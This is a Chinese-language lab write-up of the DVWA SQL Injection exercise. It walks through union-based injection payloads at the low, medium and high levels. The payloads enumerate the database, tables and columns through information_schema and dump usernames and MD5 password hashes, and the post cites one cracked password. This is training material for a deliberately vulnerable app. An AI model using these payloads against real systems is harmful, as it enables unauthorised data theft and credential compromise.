#笔记(二十八)#dvwa漏洞SQL Injection wp

SQL Injection

low
  1. 查看源代码,没有过滤
    在这里插入图片描述
  2. 用1试没问题,1’不行,1’‘和1’#都没问题
  3. 先试一下爆库1’ union select 1,database()#,可以看到有回显,目前数据库dvwa
    在这里插入图片描述
  4. 爆表 1’ union select 1,table_name from information_schema.tables where table_schema=‘dvwa’#,能看到有个user的表
    在这里插入图片描述
  5. 列 1’ union select 1,column_name from information_schema.columns where table_name=‘users’#可以看到里面最重要的password列
    在这里插入图片描述
  6. 1’ union select 1,concat(user) from users#得到用户名
    在这里插入图片描述
  7. 1’ union select 1,concat(password) from users#得到密码
    在这里插入图片描述
  8. 对应输一下,发现emmmmm要解密md5,试一下gordonb的密码abc123
    在这里插入图片描述
  9. 心力憔悴.jpg
medium
  • emmmmm换了形式,不能get进去了
    在这里插入图片描述
  • 先看代码,看见一个不可爱的函数mysql_real_escape_string(),还有一个提示,post上去
    在这里插入图片描述
  • 抓包后,能看见注入方式id=1&Submit=Submit
    在这里插入图片描述
  • 所以试一试id=1 union select 1,database()# &Submit=Submit
    (因为’不能用,所以直接去掉)
    在这里插入图片描述
  • 其他的和low一样,爆出来users和password后,对照了一下,是一样的
    在这里插入图片描述
high
  • 点进去弹出来一个框,???,似乎是防SQLmap的
    在这里插入图片描述
  • 代码里面,一个SESSION百度完是弹出那个框框数据不丢失用的(大概),一个就是LIMIT 1,强制 SELECT 语句返回指定的记录数,具体的意思只能说半知半解,但对于漏洞来说,没有影响???
    在这里插入图片描述
  • 熟悉的图片
    在这里插入图片描述
  • emmmmm个人感觉,这个题可能就是想让我们好好理解LIMIT用法,包括简化等等
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值